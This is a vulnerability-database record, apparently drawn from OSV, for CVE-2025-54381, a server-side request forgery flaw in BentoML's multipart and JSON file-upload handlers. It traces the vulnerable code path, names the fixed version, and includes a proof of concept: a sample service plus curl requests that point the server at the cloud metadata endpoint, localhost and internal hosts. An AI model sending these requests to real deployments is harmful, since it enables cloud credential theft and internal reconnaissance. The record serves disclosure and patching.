{"id":"CVE-2025-54381","aliases":["GHSA-mrmq-3q62-6cc8","PYSEC-2026-297"],"title":"BentoML SSRF Vulnerability in File Upload Processing  ","summary":"BentoML SSRF Vulnerability in File Upload Processing  ","severity":"critical","cvss":9.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L","vendor":"bentoml","product":"bentoml","ecosystem":"pip","affected":["bentoml >= 1.4.0, < 1.4.19"],"patched":["bentoml 1.4.19"],"published":"2025-07-29","updated":"2026-09-10","sourceUpdated":"2026-09-10T03:50:57.932414019Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-mrmq-3q62-6cc8","references":[{"url":"https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54381"},{"url":"https://github.com/bentoml/BentoML/commit/534c3584621da4ab954bdc3d814cc66b95ae5fb8"},{"url":"https://github.com/bentoml/BentoML"}],"tags":["osv","pip","exploit-available"],"epss":0.14011,"epssPercentile":0.96385,"exploits":{"github":1,"githubRepos":["https://github.com/rockmelodies/bentoml_CVE-2025-54381"],"checkedAt":"2026-09-23T07:13:36.977Z"},"exploitAvailable":true,"ingestedAt":"2026-09-12T03:13:01.712Z","slug":"CVE-2025-54381","body":"## Overview\n\n### Description\n\nThere's an SSRF in the file upload processing system that allows remote attackers to make arbitrary HTTP requests from the server without authentication. The vulnerability exists in the serialization/deserialization handlers for multipart form data and JSON requests, which automatically download files from user-provided URLs without proper validation of internal network addresses.\n\nThe framework automatically registers any service endpoint with file-type parameters (`pathlib.Path`, `PIL.Image.Image`) as vulnerable to this attack, making it a framework-wide security issue that affects most real-world ML services handling file uploads. While BentoML implements basic URL scheme validation in the `JSONSerde` path, the `MultipartSerde` path has no validation whatsoever, and neither path restricts access to internal networks, cloud metadata endpoints, or localhost services.\n\nThe documentation explicitly promotes this URL-based file upload feature, making it an intended but insecure design that exposes all deployed services to SSRF attacks by default.\n\n### Source - Sink Analysis\n\n**Source:** User-controlled multipart form field values and JSON request bodies containing URLs\n\n**Call Chain - Path 1 (MultipartSerde - No Validation):**\n1. HTTP POST request with multipart form data to any BentoML endpoint with file-type input parameters  \n2. `MultipartSerde.parse_request()` in `src/_bentoml_impl/serde.py:202` processes the request\n3. `form = await request.form()` parses multipart data using Starlette\n4. For file-type fields: `value = [await self.ensure_file(v) for v in form.getlist(k)]` at line 209\n5. `MultipartSerde.ensure_file()` called at lines 186-200 with user-controlled string URL\n6. **Sink:** `resp = await client.get(obj)` at line 193 - Direct HTTP request with zero validation\n\n**Call Chain - Path 2 (JSONSerde - Weak Validation):**  \n1. HTTP POST request with JSON body containing URL to endpoint with `IORootModel` + `multipart_fields`\n2. `JSONSerde.parse_request()` in `src/_bentoml_impl/serde.py:157` processes the request\n3. `body = await request.body()` extracts request body\n4. Condition check: `if issubclass(cls, IORootModel) and cls.multipart_fields:` at line 164\n5. Weak validation: `if is_http_url(url := body.decode(\"utf-8\", \"ignore\")):` at line 165 (only checks scheme)\n6. **Sink:** `resp = await client.get(url)` at line 168 - HTTP request after insufficient validation\n\n### Proof of Concept\n\nCreate a BentoML service:\n```python\nfrom pathlib import Path\nimport bentoml\n\n@bentoml.service  \nclass ImageProcessor:\n    @bentoml.api\n    def process_image(self, image: Path) -> str:\n        return f\"Processed image: {image}\"\n```\n\nDeploy and exploit:\n```bash\n# Start service (binds to 0.0.0.0:3000 by default)\nbentoml serve service.py:ImageProcessor\n\n# SSRF Attack 1 - Access AWS metadata  \ncurl -X POST http://target:3000/process_image \\\n     -F 'image=http://169.254.169.254/latest/meta-data/'\n\n# SSRF Attack 2 - Internal service enumeration\ncurl -X POST http://target:3000/process_image \\  \n     -F 'image=http://localhost:8080/admin'\n\n# SSRF Attack 3 - Internal network scanning\ncurl -X POST http://target:3000/process_image \\\n     -F 'image=http://10.0.0.1:22'\n```\n\nExpected result: Server makes HTTP requests to internal/cloud endpoints, potentially returning sensitive data in error messages or logs.\n\n### Impact\n- Access AWS/GCP/Azure cloud metadata services for credential theft\n- Enumerate and interact with internal HTTP services and APIs  \n- Bypass firewall restrictions to reach internal network resources\n- Perform network reconnaissance from the server's perspective\n- Retrieve sensitive information disclosed in HTTP response data\n- Potential for internal service exploitation through crafted requests\n\n### Remediation  \n\nImplement comprehensive URL validation in both serialization paths by adding network restriction checks to prevent access to internal/private network ranges, localhost, and cloud metadata endpoints. The existing `is_http_url()` function should be enhanced to include allowlist validation rather than just scheme checking.\n\n## Affected packages\n\n- `bentoml >= 1.4.0, < 1.4.19`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `bentoml 1.4.19`","depth":"abyssal","depthScore":69,"depthScoreParts":{"impact":54.5,"likelihood":2.8,"exploitation":12,"ransomware":0},"changes":[]}